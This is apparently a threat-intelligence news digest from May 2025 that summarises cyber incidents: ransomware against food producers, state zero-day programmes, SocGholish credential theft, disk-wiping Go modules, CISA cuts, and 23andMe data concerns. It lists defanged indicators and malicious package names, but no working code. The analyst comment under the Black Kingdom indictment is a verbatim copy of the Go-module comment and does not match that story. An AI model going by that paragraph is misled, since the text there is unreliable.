Sunday, May 04, 2025 // (IG): BB // GITHUB // SN R&D
Cyberattacks Surge on Food and Agriculture Sector as Industry Warns of Underfunded Defenses
Bottom Line Up Front (BLUF): Ransomware attacks on the food and agriculture sector have doubled in 2025, exposing critical vulnerabilities in one of the United States’ most essential industries. Lawmakers and cybersecurity experts warn that outdated infrastructure, limited visibility, and insufficient federal oversight leave farms, processors, and food distributors dangerously exposed to cyber threats. Despite recent incidents, the U.S. Department of Agriculture (USDA) has been criticized for lacking direction and resources to address the mounting risks.
Analyst Comments: Cybercriminal groups like Clop, RansomHub, and Akira are intensifying their focus on food supply chain targets due to their reliance on legacy technology, limited IT staffing, and the sector's time-sensitive operations. The rise of precision agriculture and GPS-linked systems, while improving efficiency, has widened the attack surface. Without dedicated funding and a coordinated federal cybersecurity strategy, cold storage, processing plants, or logistics platforms disruptions could lead to immediate national supply shortages. The bipartisan push in Congress for a sector-specific risk assessment and simulation exercise is a critical first step. Still, broader regulatory reform and cyber resilience investments are urgently needed to safeguard the nation’s food security.
FROM THE MEDIA: Rep. Brad Finstad (R-MN) warned at a Hack the Capitol panel in May 2024 that agricultural systems are increasingly digital and exposed to sophisticated cyber threats. Despite this, the USDA allocates less than $1 million toward cybersecurity, according to experts like Mark Montgomery of the Foundation for Defense of Democracies. Meanwhile, data collected by Food and Ag-ISAC shows ransomware attacks more than doubled in early 2025, with 84 incidents in Q1 alone. Notable incidents include million-dollar disruptions to poultry producers in South Africa and a Siberian dairy processor. CyberScoop also reports that ransomware now accounts for over half of all known threats targeting the food sector, with many victims opting not to report attacks due to reputational and operational fears.
READ THE STORY: CS // The Record
China and North Korea Scale Zero-Day Exploit Ecosystems to Strategic Threat Level
Bottom Line Up Front (BLUF): China and North Korea have established industrial-scale, state-backed systems for developing, stockpiling, and deploying zero-day exploits. These structured ecosystems leverage academia, military units, and private entities to support strategic cyber operations, economic disruption, and long-term infiltration of global critical infrastructure. The sophistication and scale of these programs pose a growing challenge to conventional cybersecurity models.
Analyst Comments: By fusing state resources with academic and private-sector talent, these regimes have built exploit pipelines that rival traditional tech-sector R&D in scale and sophistication. China’s use of AI-driven tools and public “bug bounty” fronts like Tianfu Cup serves dual purposes of talent acquisition and covert capability development. Meanwhile, while leaner, North Korea’s operations are tactically aggressive and financially motivated. The warehousing of exploits for maximum strategic leverage adds unpredictability to an already volatile cyber threat landscape. This suggests a need for proactive global vulnerability intelligence sharing and stricter oversight of supply chain dependencies.
FROM THE MEDIA: At the RSA Conference 2025, Google Cloud’s Threat Intelligence team reported that for the first time, North Korea matched China in zero-day exploit volume. Chief analyst John Hultquist highlighted that these exploits are discovered and weaponized via organized, state-directed programs integrating military, academic, and private-sector resources. China and North Korea increasingly automate discovery and delivery through advanced fuzzing, continuous testing platforms, and malware-as-a-service frameworks. Their targets include aerospace firms, financial systems, and Western software supply chains, with the aim of securing persistent access, causing disruption, and extracting economic value.
READ THE STORY: Gov InfoSec
RansomHub Deploys SocGholish for WebDAV and SCF-Based Credential Heists
Bottom Line Up Front (BLUF): RansomHub ransomware operators leverage the SocGholish malware loader to infiltrate networks using fake browser updates and vulnerable CMS platforms. Recent campaigns exploit WebDAV and SCF file tricks to harvest NTLM credentials, enabling stealthy lateral movement and paving the way for ransomware deployment.
Analyst Comments: Using legacy protocols like WebDAV and SCF demonstrates attackers’ strategic pivot toward system-level exploitation rather than relying solely on user interaction. These techniques bypass typical endpoint defenses, emphasizing the need for organizations to disable outdated Windows protocols, enforce network segmentation, and implement advanced monitoring for NTLM hash leaks. Blending SocGholish with RansomHub infrastructure reveals a maturing ecosystem where loader malware is a persistent foothold for ransomware affiliates.
FROM THE MEDIA: Darktrace researchers have tracked a string of SocGholish infections since January 2025, tied to compromised WordPress sites distributing JavaScript-based fake browser updates. Affected users were redirected to Keitaro TDS domains, where they unknowingly downloaded ZIP archives containing the loader. Post-compromise activity included exploitation of WebDAV to initiate NTLM hash leaks via forced authentication to external IPs and the use of ‘Thumbs.scf’ files on internal SMB shares to stealthily harvest credentials. The malware also deployed Python-based backdoors for persistent access and used encrypted C2 communications, employing non-standard ports to evade detection. These infections ultimately funneled access to RansomHub ransomware infrastructure, which uses techniques like port-hopping and HTTPS-based C2 to obfuscate traffic. Indicators of Compromise (IoCs) include domains such as packedbrick[.]com and IP addresses like 185.174.101[.]240 linked to RansomHub’s command infrastructure.
READ THE STORY: GBhackers
Malicious Go Modules Unleash Disk-Wiping Linux Malware in Advanced Supply Chain Attack
Bottom Line Up Front (BLUF): Researchers have uncovered three malicious Go modules that deliver disk-wiping malware targeting Linux systems through obfuscated code and remote payload execution. The malware completely erases the primary disk (/dev/sda), rendering systems unbootable and irrecoverable, highlighting the growing severity of software supply chain threats.
Analyst Comments: Unlike traditional data theft or ransomware, this disk-wiping tactic aims to maximize operational disruption, particularly within Linux server and developer environments. Using trusted code repositories like GitHub to distribute these modules raises critical concerns for software integrity. Organizations must implement tighter dependency vetting, continuous monitoring, and behavior-based anomaly detection to mitigate such threats. This also points to the urgent need for stronger package management policies and digital signing of software components to enhance authenticity verification.
FROM THE MEDIA: Three Go packages (prototransform, go-mcp, and tlsproxy) hosted on GitHub contained obfuscated logic to download and execute a shell script that overwrites Linux primary disks. Upon detecting a Linux environment, the malicious modules fetch the payload using wget, triggering irreversible data destruction via the dd command. This aligns with a broader trend of supply chain abuse: additional findings from Socket, Fortinet, and Sonatype include npm and PyPI packages stealing mnemonic seed phrases and using Gmail SMTP servers and WebSockets for data exfiltration and command execution. Notable malicious npm packages include crypto-encrypt-ts and userrelationship-paypal, while compromised PyPI packages like coffin-codes-2022 have collectively amassed tens of thousands of downloads. These developments reveal how attackers exploit open-source ecosystems' trust and ubiquity for both sabotage and espionage.
READ THE STORY: THN
Cybersecurity Community Pushes Back as Trump Administration Guts CISA, Fires Leadership
Bottom Line Up Front (BLUF): Some in the cybersecurity community publicly protest the Trump administration’s sweeping personnel cuts and strategic shifts within federal cyber agencies, especially the Cybersecurity and Infrastructure Security Agency (CISA). These changes, including the firing of top cyber officials and a proposed $500 million budget cut to CISA, have sparked fears of weakened national resilience amid escalating threats from Russia and China.
Analyst Comments: The removal of leadership figures like Gen. Timothy Haugh (NSA, CYBERCOM) and Chris Krebs, paired with dramatic defunding efforts, signals a sharp pivot in the federal cyber policy playbook. While the administration insists reforms are aimed at streamlining operations, industry insiders interpret the moves as politically motivated retaliation. The timing—amid increasing cyber aggression from adversaries—could embolden state-aligned attackers and degrade U.S. deterrence. The backlash from cyber professionals, including over 400 signatories to public letters of protest, indicates a rare breach in the traditionally apolitical infosec community, highlighting the severity of perceived risk. These fractures could deepen unless coherent policy and leadership stability are restored quickly.
FROM THE MEDIA: Former CISA Director Jen Easterly resigned on Inauguration Day, and prominent figures like Chris Krebs have faced investigations and loss of security privileges. A rising chorus from RSA Conference attendees, former officials, and industry leaders warns that these shifts threaten the country’s ability to counter increasing cyber threats. Homeland Security Secretary Kristi Noem and National Security Council cyber lead Alexei Bulazel attempted to calm concerns during the conference. Still, vague assurances failed to convince many in the field, who fear the administration is prioritizing politics over protection.
READ THE STORY: Politico
U.S. Indicts Yemeni Hacker Behind Black Kingdom Ransomware Attacks on 1,500 Systems
Bottom Line Up Front (BLUF): The U.S. Department of Justice has charged Rami Khaled Ahmed, a Yemeni national, for developing and deploying the Black Kingdom ransomware between March 2021 and June 2023. The campaign compromised approximately 1,500 systems across sectors, including healthcare, education, and hospitality in the U.S., exploiting Microsoft Exchange vulnerabilities.
Analyst Comments: Unlike traditional data theft or ransomware, this disk-wiping tactic aims to maximize operational disruption, particularly within Linux server and developer environments. Using trusted code repositories like GitHub to distribute these modules raises critical concerns for software integrity. Organizations must implement tighter dependency vetting, continuous monitoring, and behavior-based anomaly detection to mitigate such threats. This also points to the urgent need for stronger package management policies and digital signing of software components to enhance authenticity verification.
FROM THE MEDIA: Black Kingdom, although technically crude, leveraged widely known vulnerabilities and social engineering to cause significant disruption, demonstrating that sophistication is not always required for effectiveness. This case highlights the long tail of ransomware campaigns that began during the ProxyLogon wave in early 2021 and signals continued concern about persistent actors operating in less-policed jurisdictions. As ransomware ecosystems fragment, prosecution efforts are crucial in disrupting even the lower-tier actors fueling the ransomware-as-a-service model.
READ THE STORY: The Record
Rhysida Ransomware Gang Claims Hack of Peruvian Government’s Digital Platform
Bottom Line Up Front (BLUF): The Rhysida ransomware group has claimed responsibility for a cyberattack against Gob.pe, the official digital services platform of the Peruvian government, demanding a ransom of 5 BTC (~$488,000 USD). While Peruvian authorities deny a cyberattack and attribute service disruptions to maintenance, threat intelligence firms and leaked data samples suggest otherwise. The attack is the latest in a growing list of government-targeted operations by the Russian-linked gang.
Analyst Comments: Rhysida's alleged breach of Peru’s centralized digital infrastructure underscores the group’s ongoing focus on public-sector targets, exploiting high-value platforms to extort ransom payments and reputational leverage. The group’s ability to conduct double extortion attacks—exfiltrating sensitive documents before encryption—mirrors a broader ransomware evolution. Notably, Rhysida continues to target countries and institutions with limited cyber maturity or under geopolitical strain, suggesting opportunistic targeting within broader regional disruption campaigns. If confirmed, this would be a critical wake-up call for Latin American states to invest in more resilient cybersecurity architectures, particularly for centralized digital platforms housing citizen data.
FROM THE MEDIA: The gang shared sample documents and issued a seven-day deadline for payment. Peruvian officials denied any breach, attributing website outages to “scheduled maintenance,” although independent analysis suggests partial confirmation of Rhysida’s claims. This attack follows a pattern of municipal and government-targeted operations by the group, which has previously impacted Montreal-Nord, the City of Columbus, and Seattle-Tacoma International Airport. The FBI and CISA warned about Rhysida’s tactics in a 2023 joint advisory under the #StopRansomware initiative.
READ THE STORY: Security Affairs
Items of interest
Genetic Data at Risk: 23andMe Bankruptcy Sparks National Security Fears Over Chinese Acquisition
Bottom Line Up Front (BLUF): The bankruptcy of genetic testing firm 23andMe has triggered national security concerns about the potential sale of its vast genomic database to foreign adversaries, particularly the Chinese government. With more than 15 million individuals' DNA profiles at stake, experts warn that gaps in U.S. bankruptcy and foreign investment law could allow the Chinese Communist Party to exploit the situation and acquire this sensitive biometric data.
Analyst Comments: China’s strategic focus on biotechnology as a geopolitical and military power domain makes U.S. genomic data a high-value target. Despite 23andMe’s public statement that it will not sell to “countries of concern,” U.S. law lacks sufficient safeguards to prevent indirect or covert acquisition during bankruptcy. Chinese entities, including those affiliated with the People’s Liberation Army, have previously used bankruptcy courts to bypass national security reviews, as in the 2017 Atop Tech case. Genetic information isn’t just personal—it has strategic value for surveillance, military enhancement, and even targeted bioweapon research. U.S. policymakers must modernize foreign investment and data security laws to prevent adversarial access to genomic databases.
FROM THE MEDIA: According to an op-ed in The Hill by Craig Singleton of the Foundation for Defense of Democracies, 23andMe’s Chapter 11 filing could open the door for foreign buyers, including Chinese firms aligned with Beijing’s military-civil fusion doctrine, to bid on its genetic database. The data includes intimate health and ancestral information on millions of users. Singleton notes China’s 2020 Biosecurity Law compels Chinese firms to share biological data with the state, and PLA strategists view genetic data as crucial to developing next-generation military capabilities. Though 23andMe has stated it will not sell to adversarial nations, experts argue that U.S. oversight mechanisms are too weak to guarantee that promise will be upheld during bankruptcy proceedings.
READ THE STORY: The Hill
Your genetic data was hacked, now it's for sale: The dark fall of 23andMe (Video)
FROM THE MEDIA: 23andMe is going bankrupt, and your genetic data—your biological instruction manual—could be sold to the highest bidder.
𝟮𝟯𝗮𝗻𝗱𝗠𝗲 𝗕𝗔𝗡𝗞𝗥𝗨𝗣𝗧𝗖𝗬: 𝗪𝗵𝗮𝘁 𝗛𝗮𝗽𝗽𝗲𝗻𝘀 𝘁𝗼 𝗬𝗼𝘂𝗿 𝗗𝗡𝗔 𝗗𝗮𝘁𝗮 & 𝗣𝗿𝗶𝘃𝗮𝗰𝘆? (Video)
FROM THE MEDIA: 23andMe, the popular genetic testing company, has filed for Chapter 11 bankruptcy. This video explains why they faced financial troubles, including challenges beyond just ancestry analysis and the impact of a major data breach.
The selected stories cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in its original material or related links on its sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.